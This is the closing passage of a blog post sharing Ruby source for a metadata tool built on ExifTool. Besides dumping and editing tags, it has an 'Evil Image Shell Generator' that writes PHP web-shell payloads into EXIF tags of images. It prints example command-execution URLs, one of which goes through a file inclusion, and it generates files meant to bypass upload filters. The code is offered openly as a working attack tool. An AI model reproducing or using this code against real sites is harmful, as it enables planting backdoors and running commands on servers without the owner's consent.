- puts "\nStarting the GUI now".light_blue + "....".white
- Tk.mainloop()
- when 1
- # Tag Dump
- photo =[:img])
- v = photo.exiftool_version.to_s.split('.')
- height = photo.image_height
- width = photo.image_width
- puts
- puts "ExifTool v#{v[0]}".light_red + ".".white + "#{v[1]}".light_red
- puts
- puts "Meta Info from".light_blue + ": #{options[:img].split('/')[-1]}".white
- puts "Image Dimensions".white.underline + ": ".white
- puts "Image Height".light_blue + ": #{height}".white
- puts "Image Width".light_blue + ": #{width}".white
- puts
- puts "Available Tags".white.underline + ": ".white
- photo.tags.sort.each do |tag|
- puts "#{tag}".light_blue + ": #{photo[tag]}".white
- end
- when 2
- # Write to Tag
- photo =[:img])
- v = photo.exiftool_version.to_s.split('.')
- height = photo.image_height
- width = photo.image_width
- puts
- puts "ExifTool v#{v[0]}".light_red + ".".white + "#{v[1]}".light_red
- puts
- if not photo.tags.include?(options[:tag])
- puts "Provided Tag doesn't appear to exist".light_red +"!".white
- if photo.tags.include?('Comment')
- puts "Trying generic approach to try and write to 'Comment' Tag".light_yellow + ".....".white
- options[:tag] = 'Comment'
- else
- puts "Trying generic approach to create and write to Comment Tag".light_yellow + ".....".white
- options[:tag] = 'Comment'
- end
- end
- original = photo[options[:tag]]
- puts "Attempting write to the ".light_blue + "'".white + "#{options[:tag]}".light_blue + "'".white + " tag".light_blue +"....".white
- puts "Current Value".light_blue + ": #{original}".white
- puts "Write String".light_blue + ": #{options[:str]}".white
- if write(photo, options[:str], options[:tag])
- photo.reload # reload the new file info
- if original != photo[options[:tag]]
- puts
- puts "Appears things were successful".light_green + "!".white
- puts "Updated Value".light_green + ": #{photo[options[:tag]]}".white
- else
- puts "WTF".light_red + "?".white + " Doesn't appear we changed the value".light_red + ".....".white
- puts "Value".light_yellow + ": #{photo[options[:tag]]}".white
- puts "Make sure Tag name was spelled properly, is writable and try again".light_red + "...".white
- end
- else
- puts "Problem writing to '#{options[:tag]}' Tag".light_red +"!".white
- puts "Make sure Tag name exists, is spelled properly, is writable and then try again".light_red + "...".white
- end
- when 3
- # Evil Image Shell Generator
- case options[:shell].to_i
- when 0
- # Sneaky Shell
- shell = 'Sneaky'
- payload = sneaky_shell
- c = "http://localhost/#{options[:img].split('/')[-1]}?0=system&1=id"
- when 1
- # r0ng Shell
- shell = 'r0ng'
- payload = r0ng_shell
- c = "http://localhost/#{options[:img].split('/')[-1]}?r0ng=id"
- when 2
- # System Shell
- shell = 'System'
- payload = system_shell
- c = "http://localhost/forum/profile.php?inc=/profiles/0123456789/#{options[:img].split('/')[-1]}?cmd=id"
- when 3
- # Eval Shell
- shell = 'Eval'
- payload = eval_shell
- c = "http://localhost/#{options[:img].split('/')[-1]}?cmd=system('id');"
- end
- # Make sure our evil images directory exists, if not create
- # We also create a temporary directory to move images in and out of for use without affecting original
- # Delete temp dir and cleanup when done
- tmp = HOME + '/temp'
- Dir.mkdir(EVIL) unless File.exists?(EVIL) and
- Dir.mkdir(tmp) unless File.exists?(tmp) and
- real =[:img])
- innocent = tmp + '/' + options[:img].split('/')[-1]
- FileUtils.copy_file(options[:img], innocent, preserve = true)
- Dir.chdir(tmp) do
- photo =[:img].split('/')[-1])
- v = photo.exiftool_version.to_s.split('.')
- height = photo.image_height
- width = photo.image_width
- puts
- puts "ExifTool v#{v[0]}".light_red + ".".white + "#{v[1]}".light_red
- puts
- if not real.tags.include?(options[:tag])
- puts "Provided Tag doesn't appear to exist".light_red +"!".white
- if real.tags.include?('Comment')
- puts "Trying generic approach to try and write to 'Comment' Tag".light_yellow + ".....".white
- options[:tag] = 'Comment'
- else
- puts "Trying generic approach to create and write to Comment Tag".light_yellow + ".....".white
- options[:tag] = 'Comment'
- end
- end
- original = photo[options[:tag]]
- puts "Attempting to write ".light_blue + "'".white + "#{shell} Shell".light_blue + "'".white + " to the ".light_blue + "'".white +"#{options[:tag]}".light_blue + "'".white + " tag".light_blue +"....".white
- puts "Current Value".light_blue + ": #{original}".white
- puts "Write String".light_blue + ": \n#{payload}".white
- puts
- if write(photo, payload, options[:tag])
- photo.reload # reload the new file info
- if original != photo[options[:tag]]
- FileUtils.copy_file(options[:img].split('/')[-1], "#{EVIL}/#{options[:img].split('/')[-1]}", preserve = true)
- puts
- puts "Appears things were successful".light_green +"!".white
- puts "Updated Value".light_green + ": #{photo[options[:tag]]}".white
- puts "Find your evil image here".light_green + ": #{EVIL}#{options[:img].split('/')[-1]}".white
- puts "Example #{shell} Shell Execution".light_green + ": #{c}".white
- else
- puts "WTF".light_red + "?".white + " Doesn't appear we changed the value".light_red + ".....".white
- puts "Value".light_yellow + ": #{photo[options[:tag]]}".white
- puts "Make sure Tag name was spelled properly, is writable and try again".light_red + "...".white
- end
- else
- puts "Problem writing to '#{options[:tag]}' Tag".light_red +"!".white
- puts "Make sure Tag name exists, is spelled properly, is writable and then try again".light_red + "...".white
- end
- end
- FileUtils.rm_rf(tmp)
- when 4
- # Delete MetaTag if possible
- photo =[:img])
- if not photo.tags.include?(options[:tag])
- puts "Can't delete what doesn't exist".light_red + "!".white
- puts "Make sure Tag name exists, is spelled properly, is writable and then try again".light_red + "...".white
- else
- if delete(photo, options[:tag])
- puts
- puts "Appears MetaTag removal was successful".light_green +"!".white
- puts "Run the dump option to confirm the changes".light_green+ "....".white
- else
- puts "Problem wiping Tag".light_red + "!".white
- puts "Make sure Tag name exists, is spelled properly, is writable and then try again".light_red + "...".white
- end
- end
- when 5
- # Uploads Generator
- puts
- puts "Generating file upload bypass possibilities for #{options[:shell].split('/')[-1]}".light_blue + ".....".white
- generate_uploads(options[:shell], flip='gif')
- puts "Uploader bypass files created".light_green + "!".white
- puts "Find them all here".light_green + ": #{UP}".white
- puts "May the force be with you".light_green + "...........".white
- end
- puts
- puts
- # EOF
Hope this is helpful to someone out there....
Until next time, Enjoy!
Post a Comment